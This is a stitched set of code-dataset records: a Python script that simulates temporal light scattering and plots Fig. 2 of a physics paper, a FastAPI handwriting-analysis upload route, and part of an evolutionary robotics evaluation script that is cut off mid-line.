int_1d_stat(R):\n S0 = np.sum([r*np.exp(1j*0*tau0) *dt for r, tau0 in zip(R, tau)])\n S2w = np.sum([r*np.exp(1j*2*omega_b*tau0) *dt for r, tau0 in zip(R, tau)])\n return omega_b*S0, omega_b*S2w\n\n\nwith Pool(30) as pool:\n Int_1d_stat_ctrlfw = np.array(pool.map(int_1d_stat, R_fw_list)) # Forward scattering power for eq (6)\n Int_1d_stat_ctrlbw = np.array(pool.map(int_1d_stat, R_bw_list)) # Backward scattering power for eq (6)\n\n\n\n#%% covariance matrix\n\nt = np.arange(0*a, (Tp-dt/10)*a, dt)\ntic = time()\ntau0_idx = np.argmin(np.abs(tau))\n\ndef row(R, i):\n return np.array(R[tau0_idx+(0-i):tau0_idx+(len(t)-i)] )\n\ndef complex_block(mat):\n return 0.5 * np.block([[np.real(mat), -np.imag(mat)],[np.imag(mat), np.real(mat)]])\n\nwith Pool(30) as pool:\n cov_alpha_fw_list = [np.array(pool.starmap(row, zip([R]*len(t), range(len(t))))) for R in R_fw_list]\n cov_alpha_bw_list = [np.array(pool.starmap(row, zip([R]*len(t), range(len(t))))) for R in R_bw_list]\n\n\n\n#%% Fig S4: ensemble structure factor validation / estimation\n\nN_ens = 10000\ndalpha_ens_fw = [np.random.multivariate_normal(np.zeros_like(np.hstack([t])), cov_alpha_fw_list[0], size=N_ens),\n np.random.multivariate_normal(np.zeros_like(np.hstack([t])), cov_alpha_fw_list[5], size=N_ens),\n np.random.multivariate_normal(np.zeros_like(np.hstack([t])), cov_alpha_fw_list[10], size=N_ens)]\ndalpha_ens_bw = [np.random.multivariate_normal(np.zeros_like(np.hstack([t])), cov_alpha_bw_list[0], size=N_ens),\n np.random.multivariate_normal(np.zeros_like(np.hstack([t])), cov_alpha_bw_list[5], size=N_ens),\n np.random.multivariate_normal(np.zeros_like(np.hstack([t])), cov_alpha_bw_list[10], size=N_ens)]\n\nR_fw, R_bw = [], []\nS_cal_fw, S_cal_bw = [], []\n\nfor ii in range(3):\n for N_include in [100, 1000, 10000]:\n R = []\n for tau0 in tau:\n idx_diff = round(tau0/dt)\n if idx_diff >=0:\n R.append(np.mean( np.conj(dalpha_ens_fw[ii][:N_include,idx_diff:])*dalpha_ens_fw[ii][:N_include,:len(t)-idx_diff] ))\n else:\n idx_diff = np.abs(idx_diff)\n R.append( np.conj(np.mean( np.conj(dalpha_ens_fw[ii][:N_include,idx_diff:])*dalpha_ens_fw[ii][:N_include,:len(t)-idx_diff] )) )\n R = np.array(R)\n S = np.sum([r*np.exp(1j*omega*tau0) * dt for r, tau0 in zip(R[1:-1], tau[1:-1])], axis=0)\n R_fw.append(R)\n S_cal_fw.append(S)\n \n R = []\n for tau0 in tau:\n idx_diff = round(tau0/dt)\n if idx_diff >=0:\n R.append(np.mean( np.conj(dalpha_ens_bw[ii][:N_include,idx_diff:])*dalpha_ens_bw[ii][:N_include,:len(t)-idx_diff] ))\n else:\n idx_diff = np.abs(idx_diff)\n R.append( 
np.conj(np.mean( np.conj(dalpha_ens_bw[ii][:N_include,idx_diff:])*dalpha_ens_bw[ii][:N_include,:len(t)-idx_diff] )) )\n R = np.array(R)\n S = np.sum([r*np.exp(1j*omega*tau0) * dt for r, tau0 in zip(R[1:-1], tau[1:-1])], axis=0)\n R_bw.append(R)\n S_cal_bw.append(S)\n\nfig, ax = plt.subplots(3,2, figsize=(6, 3.5), sharex=True)\nfor ii in range(3):\n ax[ii,0].plot(omega/omega_b, np.real(S_fw_list[5*ii])/delta**2, lw=2, color='crimson', label='Target', zorder=10)\n ax[ii,0].plot(omega/omega_b, np.real(S_cal_fw[3*ii])/delta**2, lw=0.5, color='lightsteelblue', ls='-', zorder=1, label=r'$N_\\mathrm{ens}=10^2$')\n ax[ii,0].plot(omega/omega_b, np.real(S_cal_fw[3*ii+1])/delta**2, lw=0.5, color='royalblue', ls='-', zorder=5, label=r'$N_\\mathrm{ens}=10^3$')\n ax[ii,0].plot(omega/omega_b, np.real(S_cal_fw[3*ii+2])/delta**2, lw=1, color='midnightblue', ls='-', zorder=100, label=r'$N_\\mathrm{ens}=10^4$')\n \n ax[ii,1].plot(omega/omega_b, np.real(S_bw_list[5*ii])/delta**2, lw=2, color='crimson', zorder=10)\n ax[ii,1].plot(omega/omega_b, np.real(S_cal_bw[3*ii])/delta**2, lw=0.5, color='lightsteelblue', ls='-', zorder=1)\n ax[ii,1].plot(omega/omega_b, np.real(S_cal_bw[3*ii+1])/delta**2, lw=0.5, color='royalblue', ls='-', zorder=5)\n ax[ii,1].plot(omega/omega_b, np.real(S_cal_bw[3*ii+2])/delta**2, lw=1, color='midnightblue', ls='-', zorder=100)\n\nax[2,0].set(xlim=(-3,3), xlabel=r'$\\omega/\\omega_0$')\nax[1,0].set(ylabel=r'$S_\\mathrm{FW}(\\omega)/\\delta^2$')\nax[2,1].set(xlim=(-3,3), xlabel=r'$\\omega/\\omega_0$')\nax[1,1].set(ylabel=r'$S_\\mathrm{BW}(\\omega)/\\delta^2$')\n\nax[0,0].legend(frameon=False, loc=2, fontsize=6.7, ncol=2)\nfig.tight_layout()\nfig.savefig('FigS2_validation_Sw.pdf', format='pdf', dpi=1200)\nfig.savefig('FigS2_validation_Sw.png', format='png', dpi=400)\n\n\n\n#%% Scattering ensemable simulation, data generation\n\nN_ens = 10000\n\ndef intensity_oscillation(cov_alpha):\n P_forward_TMM, P_backward_TMM = [], []\n np.random.seed(0)\n \n dalpha_ens = np.random.multivariate_normal(np.zeros_like(np.hstack([t])), cov_alpha, size=N_ens)\n \n for dalpha in dalpha_ens:\n alpha = 1+ dalpha\n sys = TMM.time_dep(dt*np.ones_like(t), 1/alpha, np.ones_like(t), 1, 1)\n trans, reflec = sys.evolution(omega_b)[3:5]\n P_forward = np.abs(trans-np.exp(-1j*omega_b*Tp))**2\n P_backward = np.abs(reflec)**2\n P_forward_TMM.append(P_forward)\n P_backward_TMM.append(P_backward)\n return np.array(P_forward_TMM), np.array(P_backward_TMM)\n\n\ntic = time()\n\nP_ctrlfw_ens = [intensity_oscillation(cov) for cov in cov_alpha_fw_list] # TMM data for Fig 2c\nP_ctrlbw_ens = [intensity_oscillation(cov) for cov in cov_alpha_bw_list] # TMM data for Fig 2d\n\n\nP_ctrlfw_fw_ens = np.array([pens[0] for pens in P_ctrlfw_ens])\nP_ctrlfw_bw_ens = np.array([pens[1] for pens in P_ctrlfw_ens])\nP_ctrlbw_fw_ens = np.array([pens[0] for pens in P_ctrlbw_ens])\nP_ctrlbw_bw_ens = np.array([pens[1] for pens in P_ctrlbw_ens])\n\ntoc = time()\nprint(toc-tic)\n\nnp.savetxt('Data_Fig2_fwctrl_fw_ens.csv', P_ctrlfw_fw_ens, delimiter=' ')\nnp.savetxt('Data_Fig2_fwctrl_bw_ens.csv', P_ctrlfw_bw_ens, delimiter=' ')\nnp.savetxt('Data_Fig2_bwctrl_fw_ens.csv', P_ctrlbw_fw_ens, delimiter=' ')\nnp.savetxt('Data_Fig2_bwctrl_bw_ens.csv', P_ctrlbw_bw_ens, delimiter=' ')\n\n\n\n\n#%% Fig 2\n\nP_ctrlfw_fw_ens = np.loadtxt('Data_Fig2_fwctrl_fw_ens.csv', delimiter=' ') # Change this file name if you want to check the ensemble data in the manuscript (data link at README.md)\nP_ctrlfw_bw_ens = np.loadtxt('Data_Fig2_fwctrl_bw_ens.csv', delimiter=' ') # 
Change this file name if you want to check the ensemble data in the manuscript (data link at README.md)\nP_ctrlbw_fw_ens = np.loadtxt('Data_Fig2_bwctrl_fw_ens.csv', delimiter=' ') # Change this file name if you want to check the ensemble data in the manuscript (data link at README.md)\nP_ctrlbw_bw_ens= np.loadtxt('Data_Fig2_bwctrl_bw_ens.csv', delimiter=' ') # Change this file name if you want to check the ensemble data in the manuscript (data link at README.md)\n\n\ncs = np.array([0.2,0.2,0.2,1]).reshape(1,-1)\nce = np.array(matplotlib.colors.to_rgba('mediumvioletred')).reshape(1,-1)\nnewcolors = cs + np.linspace(0,1,256).reshape(-1,1) @ (ce-cs)\ncmap1 = ListedColormap(newcolors)\n\nce = np.array(matplotlib.colors.to_rgba('royalblue')).reshape(1,-1)\nnewcolors = cs + np.linspace(0,1,256).reshape(-1,1) @ (ce-cs)\ncmap2 = ListedColormap(newcolors)\n\nfig = plt.figure(figsize=(7.08, 2.4))\ngs = GridSpec(nrows=125, ncols=200)\n\n\n\nax = np.array([fig.add_subplot(gs[10:58,0:33]), fig.add_subplot(gs[62:110,0:33]),\n fig.add_subplot(gs[10:41,51:98]), \n fig.add_subplot(gs[44:76,51:98]),\n fig.add_subplot(gs[79:110,51:98]),\n fig.add_subplot(gs[10:58,128:158]), fig.add_subplot(gs[10:58,170:200]),\n fig.add_subplot(gs[62:110,128:158]), fig.add_subplot(gs[62:110,170:200])])\n\n\n# Fig 2a\nfor ii in range(N_list):\n c1 = cmap1(ii/(N_list)*0.999)\n ax[0].plot(omega/omega_b, S_fw_list[ii]*omega_b/delta**2, c=c1, lw=1)\n \n c2 = cmap2(ii/(N_list)*0.999)\n ax[1].plot(omega/omega_b, S_bw_list[ii]*omega_b/delta**2, c=c2, lw=1)\n \nax[0].set_title('Structure factor', fontsize=7)\nax[0].set(xticks=np.linspace(-2,2,3), xticklabels=[], xlim=(-3,3),\n ylabel=r'$S_\\mathrm{FW}(\\omega)$', ylim=(0,np.max(S_fw_list*omega_b/delta**2)))\nax[1].set(xticks=np.linspace(-2,2,3), xlabel=r'$\\omega/\\omega_0$', xlim=(-3,3),\n ylabel=r'$S_\\mathrm{BW}(\\omega)$', ylim=(0,np.max(S_bw_list*omega_b/delta**2)))\n\n\n# Fig 2b\nt_before = np.arange(-1*a, 0-dt/10, dt)\nt_after = np.arange(Tp*a, (Tp+1)*a-dt/10, dt)\nt_tot = np.arange(-1*a, (Tp+1)*a-dt/10, dt)\n\nSrc_Data_2b = []\n\nN_rep = 0\nnp.random.seed(2)\ndalpha = np.random.multivariate_normal(np.zeros_like(np.hstack([t])), cov_alpha_fw_list[N_rep])\nalpha = 1+ dalpha\n\nalpha_tot = np.hstack([np.ones_like(t_before), alpha, np.ones_like(t_after)])\nsys = TMM.time_dep(dt*np.ones_like(t), 1/alpha, np.ones_like(t), 1, 1)\npsi_sca = sys.evolution(omega_b)[0][:-1] - np.exp(-1j*omega_b * t)\nP_sca = np.abs(psi_sca)**2\ntrans, reflec = sys.evolution(omega_b)[3:5]\npsi_sca_after = (trans-np.exp(-1j*omega_b*Tp))*np.exp(-1j*omega_b * (t_after-Tp)) + reflec*np.exp(1j*omega_b * (t_after-Tp))\nP_sca_before = np.zeros_like(t_before)\nP_sca_after = np.abs(psi_sca_after)**2\nP_sca_tot = np.hstack([P_sca_before, P_sca, P_sca_after]) \ndepsilon = 1/alpha_tot - 1\nax[2].fill_between(t_tot, np.real(depsilon)/delta, -4, color='grey', edgecolor='k', lw=0.5, alpha=0.4)\nax[2].set(xlabel=r'$t/t_0$', xlim=(-0.5,Tp+1), xticklabels=[],xticks=(0,5,10,15,20),\n ylim=(-3.5,3.5), yticks=(-2,0,2))\nax[2].set_title('Realizations', fontsize=7)\n\nc = cmap1(N_rep/(N_list-1)*0.999)\n\naxt2 = ax[2].twinx()\naxt2.plot(t_tot, P_sca_tot/delta**2, c=c, lw=0.75)\naxt2.set(ylim=(0,np.max(P_sca_tot/delta**2)), yticks=(0, 5, 10), yticklabels=[0, 5, r'10 '])\naxt2.tick_params('y', colors=c)\naxt2.spines[\"right\"].set_edgecolor(c)\n\n\nSrc_Data_2b.append(t_tot)\nSrc_Data_2b.append(np.real(depsilon)/delta)\nSrc_Data_2b.append(P_sca_tot/delta**2)\n\n\nN_rep = 10\nnp.random.seed(2)\ndalpha = 
np.random.multivariate_normal(np.zeros_like(np.hstack([t])), cov_alpha_fw_list[N_rep])\nalpha = 1+ dalpha\n\nalpha_tot = np.hstack([np.ones_like(t_before), alpha, np.ones_like(t_after)])\nsys = TMM.time_dep(dt*np.ones_like(t), 1/alpha, np.ones_like(t), 1, 1)\npsi_sca = sys.evolution(omega_b)[0][:-1] - np.exp(-1j*omega_b * t)\nP_sca = np.abs(psi_sca)**2\ntrans, reflec = sys.evolution(omega_b)[3:5]\npsi_sca_after = (trans-np.exp(-1j*omega_b*Tp))*np.exp(-1j*omega_b * (t_after-Tp)) + reflec*np.exp(1j*omega_b * (t_after-Tp))\nP_sca_before = np.zeros_like(t_before)\nP_sca_after = np.abs(psi_sca_after)**2\nP_sca_tot = np.hstack([P_sca_before, P_sca, P_sca_after]) \ndepsilon = 1/alpha_tot - 1\nax[3].fill_between(t_tot, np.real(depsilon)/delta, -4, color='grey', edgecolor='k', lw=0.5, alpha=0.4)\nax[3].set(xlabel=r'$t/t_0$', xlim=(-0.5,Tp+1), xticklabels=[],xticks=(0,5,10,15,20),\n ylabel=r'$\\Delta\\epsilon(t)/\\delta$ ', ylim=(-3.5,3.5), yticks=(-2,0,2))\n\nc = cmap1(N_rep/(N_list-1)*0.999)\n\naxt3 = ax[3].twinx()\naxt3.plot(t_tot, P_sca_tot/delta**2, c=c, lw=0.75)\naxt3.set(ylim=(0,np.max(P_sca_tot/delta**2)), yticks=(0,50, 100, 150))\naxt3.set_ylabel(r'$|\\psi_\\mathrm{sca}(t)|^2$', color='k')\naxt3.tick_params('y', colors=c)\naxt3.spines[\"right\"].set_edgecolor(c)\n\n\nSrc_Data_2b.append(np.real(depsilon)/delta)\nSrc_Data_2b.append(P_sca_tot/delta**2)\n\nN_rep = 10\nnp.random.seed(0)\ndalpha = np.random.multivariate_normal(np.zeros_like(np.hstack([t])), cov_alpha_bw_list[N_rep])\nalpha = 1+ dalpha\n\nalpha_tot = np.hstack([np.ones_like(t_before), alpha, np.ones_like(t_after)])\nsys = TMM.time_dep(dt*np.ones_like(t), 1/alpha, np.ones_like(t), 1, 1)\npsi_sca = sys.evolution(omega_b)[0][:-1] - np.exp(-1j*omega_b * t)\nP_sca = np.abs(psi_sca)**2\ntrans, reflec = sys.evolution(omega_b)[3:5]\npsi_sca_after = (trans-np.exp(-1j*omega_b*Tp))*np.exp(-1j*omega_b * (t_after-Tp)) + reflec*np.exp(1j*omega_b * (t_after-Tp))\nP_sca_before = np.zeros_like(t_before)\nP_sca_after = np.abs(psi_sca_after)**2\nP_sca_tot = np.hstack([P_sca_before, P_sca, P_sca_after]) \ndepsilon = 1/alpha_tot - 1\nax[4].fill_between(t_tot, np.real(depsilon)/delta, -4, color='grey', edgecolor='k', lw=0.5, alpha=0.4)\nax[4].set(xlabel=r'$t/t_0$', xlim=(-0.5,Tp+1), xticks=(0,5,10,15,20),\n ylim=(-3.5,3.5), yticks=(-2,0,2))\n\nc = cmap2(N_rep/(N_list-1)*0.999)\n\naxt4 = ax[4].twinx()\naxt4.plot(t_tot, P_sca_tot/delta**2, c=c, lw=0.75)\naxt4.set(ylim=(0,np.max(P_sca_tot/delta**2)), yticks=(0, 50, 100))\naxt4.tick_params('y', colors=c)\naxt4.spines[\"right\"].set_edgecolor(c)\n\nSrc_Data_2b.append(np.real(depsilon)/delta)\nSrc_Data_2b.append(P_sca_tot/delta**2)\n\n\n# Figs 2c & 2d\nP_ctrlfw_fw_mean = np.average(P_ctrlfw_fw_ens, axis=1)\nP_ctrlfw_fw_q1 = np.percentile(P_ctrlfw_fw_ens, 25, axis=1)\nP_ctrlfw_fw_q3 = np.percentile(P_ctrlfw_fw_ens, 75, axis=1)\n\nP_ctrlfw_bw_mean = np.average(P_ctrlfw_bw_ens, axis=1)\nP_ctrlfw_bw_q1 = np.percentile(P_ctrlfw_bw_ens, 25, axis=1)\nP_ctrlfw_bw_q3 = np.percentile(P_ctrlfw_bw_ens, 75, axis=1)\n\nP_ctrlbw_fw_mean = np.average(P_ctrlbw_fw_ens, axis=1)\nP_ctrlbw_fw_q1 = np.percentile(P_ctrlbw_fw_ens, 25, axis=1)\nP_ctrlbw_fw_q3 = np.percentile(P_ctrlbw_fw_ens, 75, axis=1)\n\nP_ctrlbw_bw_mean = np.average(P_ctrlbw_bw_ens, axis=1)\nP_ctrlbw_bw_q1 = np.percentile(P_ctrlbw_bw_ens, 25, axis=1)\nP_ctrlbw_bw_q3 = np.percentile(P_ctrlbw_bw_ens, 75, axis=1)\n\n\n\nax[5].plot(S0*omega_b, 0.25*Int_1d_stat_ctrlfw[:,0]*omega_b*Tp/delta**2, 'orange', lw=0.75, label=r'Eq.(6)')\nax[7].plot(S0*omega_b, 
0.25*Int_1d_stat_ctrlfw[:,1]*omega_b*Tp/delta**2, 'orange', lw=0.75, label=r'Eq.(6)')\n\nax[6].plot(S2w*omega_b, 0.25*Int_1d_stat_ctrlbw[:,0]*omega_b*Tp/delta**2, 'orange', lw=0.75, label=r'Eq.(6)')\nax[8].plot(S2w*omega_b, 0.25*Int_1d_stat_ctrlbw[:,1]*omega_b*Tp/delta**2, 'orange', lw=0.75, label=r'Eq.(6)')\n\nfor ii in range(11):\n c1 = cmap1(ii/(N_list-1)*0.999)\n c1_err = 1-(1-np.array(c1[:3]))*0.5\n c2 = cmap2(ii/(N_list-1)*0.999)\n c2_err = 1-(1-np.array(c2[:3]))*0.5\n \n\n ax[5].errorbar(S0[ii]*omega_b, P_ctrlfw_fw_mean[ii]/delta**2, \n yerr=np.array([[P_ctrlfw_fw_mean[ii]-P_ctrlfw_fw_q1[ii]],\n [P_ctrlfw_fw_q3[ii]-P_ctrlfw_fw_mean[ii]]])/delta**2,\n ecolor=c1_err, color=c1, fmt='o', lw=2, ms=2, label='TMM' if ii==0 else None)\n \n ax[7].errorbar(S0[ii]*omega_b, P_ctrlfw_bw_mean[ii]/delta**2, \n yerr=np.array([[P_ctrlfw_bw_mean[ii]-P_ctrlfw_bw_q1[ii]],\n [P_ctrlfw_bw_q3[ii]-P_ctrlfw_bw_mean[ii]]])/delta**2,\n ecolor=c1_err, color=c1, fmt='o', lw=2, ms=2)\n \n ax[6].errorbar(S2w[ii]*omega_b, P_ctrlbw_fw_mean[ii]/delta**2, \n yerr=np.array([[P_ctrlbw_fw_mean[ii]-P_ctrlbw_fw_q1[ii]],\n [P_ctrlbw_fw_q3[ii]-P_ctrlbw_fw_mean[ii]]])/delta**2,\n ecolor=c2_err, color=c2, fmt='o', lw=2, ms=2)\n\n ax[8].errorbar(S2w[ii]*omega_b, P_ctrlbw_bw_mean[ii]/delta**2, \n yerr=np.array([[P_ctrlbw_bw_mean[ii]-P_ctrlbw_bw_q1[ii]],\n [P_ctrlbw_bw_q3[ii]-P_ctrlbw_bw_mean[ii]]])/delta**2,\n ecolor=c2_err, color=c2, fmt='o', lw=2, ms=2)\n\n\nax[5].set_title('Forward control', fontsize=7)\nax[5].set(xlim=np.array([-0.05,1.05])*S0[-1]*omega_b, xticklabels=[], xticks=(0,1,2,3),\n ylim=(0,np.max(P_ctrlfw_fw_q3/delta**2)), ylabel=r'$P_\\mathrm{FW}$', yticks=(0,50,100))\nax[7].set(xlim=np.array([-0.05,1.05])*S0[-1]*omega_b, xlabel=r'$S_0$',xticks=(0,1,2,3),\n ylim=(0,np.max(P_ctrlfw_bw_q3/delta**2)), ylabel=r'$P_\\mathrm{BW}$', yticks=(0,0.5,1), yticklabels=['0.0',0.5,' 1.0'])\n\nax[5].legend(frameon=False, fontsize=6, loc=2)\n\n\nax[6].set_title('Backward control', fontsize=7)\nax[6].set(xlim=np.array([-0.05,1.05])*S2w[-1]*omega_b, xticklabels=[],xticks=(0,1,2),\n ylim=(0,np.max(P_ctrlbw_fw_q3/delta**2)), yticks=(0,0.5,1, 1.5))\nax[8].set(xlim=np.array([-0.05,1.05])*S2w[-1]*omega_b, xlabel=r'$S_{2\\omega}$', xticks=(0,1,2),\n ylim=(0,np.max(P_ctrlbw_bw_q3/delta**2)), yticks=(0,25,50,75), yticklabels=[0,25,50,' 75'])\n\nfig.savefig('fig2.pdf', format='pdf', dpi=1200)\n\n\n\n#%% Source Data\n\n\nSrc_Data_2b = np.column_stack(Src_Data_2b)\nColumn_names = ['t', \n '(A) Delta_epsilon/delta', '(A) |Psi_sca/delta|^2', \n '(B) Delta_epsilon/delta', '(B) |Psi_sca/delta|^2',\n '(D) Delta_epsilon/delta', '(D) |Psi_sca/delta|^2']\nSrc_Data_2b = pd.DataFrame(Src_Data_2b, columns=Column_names)\n\n\nSrc_Data_2c = np.column_stack([S0*omega_b, \n P_ctrlfw_fw_mean/delta**2, P_ctrlfw_fw_q1/delta**2, P_ctrlfw_fw_q3/delta**2, 0.25*Int_1d_stat_ctrlfw[:,0]*omega_b*Tp/delta**2,\n P_ctrlfw_bw_mean/delta**2, P_ctrlfw_bw_q1/delta**2, P_ctrlfw_bw_q3/delta**2, 0.25*Int_1d_stat_ctrlfw[:,1]*omega_b*Tp/delta**2])\nColumn_names = ['S0', \n 'P_FW, mean', 'P_FW, q1', 'P_FW, q3', 'P_FW, Eq.(6)',\n 'P_BW, mean', 'P_BW, q1', 'P_BW, q3', 'P_BW, Eq.(6)']\nSrc_Data_2c = pd.DataFrame(np.real(Src_Data_2c), columns=Column_names)\n\n\nSrc_Data_2d = np.column_stack([S2w*omega_b, \n P_ctrlbw_fw_mean/delta**2, P_ctrlbw_fw_q1/delta**2, P_ctrlbw_fw_q3/delta**2, 0.25*Int_1d_stat_ctrlbw[:,0]*omega_b*Tp/delta**2,\n P_ctrlbw_bw_mean/delta**2, P_ctrlbw_bw_q1/delta**2, P_ctrlbw_bw_q3/delta**2, 0.25*Int_1d_stat_ctrlbw[:,1]*omega_b*Tp/delta**2])\nColumn_names = ['S2w', 
\n 'P_FW, mean', 'P_FW, q1', 'P_FW, q3', 'P_FW, Eq.(6)',\n 'P_BW, mean', 'P_BW, q1', 'P_BW, q3', 'P_BW, Eq.(6)']\nSrc_Data_2d = pd.DataFrame(np.real(Src_Data_2d), columns=Column_names)\n\n\nwith pd.ExcelWriter(\"SourceData_Fig2.xlsx\") as writer:\n Src_Data_2b.to_excel(writer, index=False, sheet_name=\"Fig. 2b\")\n Src_Data_2c.to_excel(writer, index=False, sheet_name=\"Fig. 2c\")\n Src_Data_2d.to_excel(writer, index=False, sheet_name=\"Fig. 2d\")\n \n \nEns_Data_2c = np.hstack([P_ctrlfw_fw_ens.T, P_ctrlfw_bw_ens.T])\nColumn_names = ['P_FW, S0='+str(round(S0[i]*omega_b,2)) for i in range(11)] + ['P_BW, S0='+str(round(S0[i]*omega_b,2)) for i in range(11)]\nEns_Data_2c = pd.DataFrame(Ens_Data_2c, columns=Column_names)\nEns_Data_2c.to_excel(\"EnsembleData_Fig2c.xlsx\", index=False)\n\nEns_Data_2d = np.hstack([P_ctrlbw_fw_ens.T, P_ctrlbw_bw_ens.T])\nColumn_names = ['P_FW, S2w='+str(round(S2w[i]*omega_b,2)) for i in range(11)] + ['P_BW, S2w='+str(round(S2w[i]*omega_b,2)) for i in range(11)]\nEns_Data_2d = pd.DataFrame(Ens_Data_2d, columns=Column_names)\nEns_Data_2d.to_excel(\"EnsembleData_Fig2d.xlsx\", index=False)\n","repo_name":"jmkim93/Temporal-Scattering","sub_path":"Fig2_target_control.py","file_name":"Fig2_target_control.py","file_ext":"py","file_size_in_byte":21212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40782757539","text":"from fastapi import APIRouter, Depends, UploadFile, File\nfrom fastapi.encoders import jsonable_encoder\nimport os\nfrom fastapi.responses import JSONResponse\n\nfrom server.controllers.graphology_controler import Output\nfrom server.utils.save_file import STATIC_FILE, save_file\nfrom server.utils.train_predict import graphology_prediction\n\nrouter = APIRouter(prefix=\"/services\")\n\n\n@router.post(\"/graphology\")\ndef grapohology_analysis(file: UploadFile = File(None)):\n # try:\n file_name=save_file(file=file)\n prediction= graphology_prediction(file_name=file_name)\n try:\n filepath= STATIC_FILE+file_name\n print(\"+++++++++++++++++++++try remove+++++++++++++++++++++\")\n os.remove(filepath)\n except:\n filepath= STATIC_FILE+\"/\"+file_name\n print(\"+++++++++++++++++++++except remove+++++++++++++++++++++\")\n os.remove(filepath)\n if prediction is None:\n return JSONResponse(\n status_code=200,\n content={\n \"success\": False,\n \"data\": None,\n \"message\": \"Data not available regarding image\",\n \"error\": None,\n },\n )\n else:\n return JSONResponse(\n status_code=200,\n content={\n \"success\": True,\n \"data\": prediction,\n \"message\": \"Analysis of Handwritten Image\",\n \"error\": None,\n },\n )\n # except Exception as e:\n # return JSONResponse(\n # status_code=400,\n # content={\n # \"success\": False,\n # \"data\": None,\n # \"message\": \"Something went wrong\",\n # \"error\": str(e),\n # },\n # )","repo_name":"akshitkhokhani/graphologist-backend","sub_path":"server/routes/graphology.py","file_name":"graphology.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72684118545","text":"import neat\nimport os\nimport evogym.envs\nfrom evogym import is_connected, has_actuator, get_full_connectivity, hashable\nimport numpy as np\nimport pickle as pkl\nimport sys\nsys.path.append('../')\nfrom typing import List\n\nfrom sgr.substrates import morph_substrate\nfrom sgr.generate_robot import generate_robot\nfrom sgr.sgr import SGR\nfrom sgr.body_speciation import CustomGenome\nfrom 
poet.poet import POET\nfrom dynamic_env.env_config import EnvConfig\nfrom pathos.multiprocessing import ProcessPool\nimport numpy as np\n\nPOET_DIRS = [\n \"new_cppn_1\",\n \"new_3d_1\",\n \"new_cppn_2\", \n \"new_3d_2\",\n \"new_cppn_3\",\n \"new_3d_3\", \n]\n\nMULT_ENV_FILES = [\n \"multiple_env_cppn_1\",\n \"multiple_env_3d_1\",\n \"multiple_env_cppn_2\", \n \"multiple_env_3d_2\",\n \"multiple_env_cppn_3\",\n \"multiple_env_3d_3\", \n]\n\nRESULTS_DIR = os.getcwd() + \"/poet_results\"\nSTEPS = 600\n\n\ndef fit_func_thread(pop, n_steps, env_name, dynamic_env_config=None):\n results_dict = {}\n reward, _ = pop.single_genome_fit(pop.pop.best_genome, n_steps, env_name, dynamic_env_config)\n results_dict[dynamic_env_config.id] = np.round(reward, 4)\n return results_dict\n\ndef multithread_eval(pop: SGR, envs: List[EnvConfig]):\n cpus = len(envs)\n pool = ProcessPool(nodes=5)\n # winner = pop.pop.best_genome\n results_map = pool.amap(\n fit_func_thread,\n [pop for _ in range(cpus)],\n [STEPS for _ in range(cpus)],\n [\"dynamic\" for _ in range(cpus)],\n envs,\n )\n results = results_map.get(timeout=60*10)\n\n fit_dict = {}\n for result_dict in results:\n for k, v in result_dict.items():\n fit_dict[k] = v\n return fit_dict\nclass POET_TEST:\n def __init__(self, test_name, envs) -> None:\n self.test_name = test_name\n self.csvs_dict = {}\n\n self.envs: List[EnvConfig] = envs\n self.dir_path = f\"{os.getcwd()}/../checkpoints/{test_name}\"\n self.create_csv(\"global\")\n\n def evaluate_gen(self, gen):\n file_path = f\"{self.dir_path}/cp_{gen}.pkl\"\n poet_pop: POET = pkl.load(open(file_path, \"rb\"))\n CustomGenome.robot_func = lambda self, net, config: generate_robot(net, poet_pop.run_params.robot_size)\n CustomGenome.substrate = morph_substrate(poet_pop.run_params.robot_size, poet_pop.run_params.substrate_type)\n CustomGenome.robot_size = poet_pop.run_params.robot_size\n CustomGenome.spec_genotype_weight = poet_pop.run_params.spec_genotype_weight\n CustomGenome.spec_phenotype_weight = poet_pop.run_params.spec_phenotype_weight\n\n for p in poet_pop.pairs:\n pop = p.agent_pop\n results = multithread_eval(pop, envs)\n print_results = f\"{gen}; {p.environment.id}; {pop.best_genome.key}\"\n for i in range(0, len(self.envs)):\n print_results += f\"; {results[i]}\"\n self.csvs_dict[\"global\"].write(print_results + \"\\n\")\n print(f\" {p.environment.id}; {pop.best_genome.key}; {results}\")\n\n def create_csv(self, original_env_id):\n csv_file = f\"{RESULTS_DIR}/POET_{self.test_name}_{original_env_id}.csv\"\n csv = open(csv_file, \"w+\")\n header = \"gen;original_env_id;genome_id\"\n for e in self.envs:\n header +=\";env\" + str(e.id) + \"_fit\"\n csv.write(header + \"\\n\")\n self.csvs_dict[original_env_id] = csv\n\nclass MULT_ENV_TEST:\n def __init__(self, test_name, envs) -> None:\n self.test_name = test_name\n self.csvs_dict = {}\n\n self.envs: List[EnvConfig] = envs\n self.dir_path = f\"{os.getcwd()}/../multiple_env_results/{test_name}\"\n self.create_csv(\"global\")\n\n def evaluate_gen(self, gen):\n file_path = f\"{self.dir_path}_pop_gen_{gen}.pkl\"\n pop: SGR = pkl.load(open(file_path, \"rb\"))\n CustomGenome.robot_func = lambda self, net, config: generate_robot(net, pop.robot_size)\n CustomGenome.substrate = morph_substrate(pop.robot_size, pop.substrate_type)\n CustomGenome.robot_size = pop.robot_size\n CustomGenome.spec_genotype_weight = 1\n CustomGenome.spec_phenotype_weight = 2\n\n winner = pop.pop.best_genome\n\n results = multithread_eval(pop, envs)\n print_results = f\"{gen}; 0; 
{winner.key}\"\n        for i in range(0, len(self.envs)):\n            print_results += f\"; {results[i]}\"\n        self.csvs_dict[\"global\"].write(print_results + \"\\n\")\n        print(f\"    0; {winner.key}; {results}\")\n\n    def create_csv(self, original_env_id):\n        csv_file = f\"{RESULTS_DIR}/MULT_ENV_{self.test_name}_{original_env_id}.csv\"\n        csv = open(csv_file, \"w+\")\n        header = \"gen;original_env_id;genome_id\"\n        for e in self.envs:\n            header += \";env\" + str(e.id) + \"_fit\"\n        csv.write(header + \"\\n\")\n        self.csvs_dict[original_env_id] = csv\n\n\nif __name__ == \"__main__\":\n    env0 = EnvConfig(0)\n    env1 = env0.create_child()\n    env1.mutate_barrier_h(.25)\n    env2 = env0.create_child()\n    env2.mutate_barrier_h(.25)\n    env3 = env1.create_child()\n    env3.mutate_barrier_h(.25)\n    env4 = env1.create_child()\n    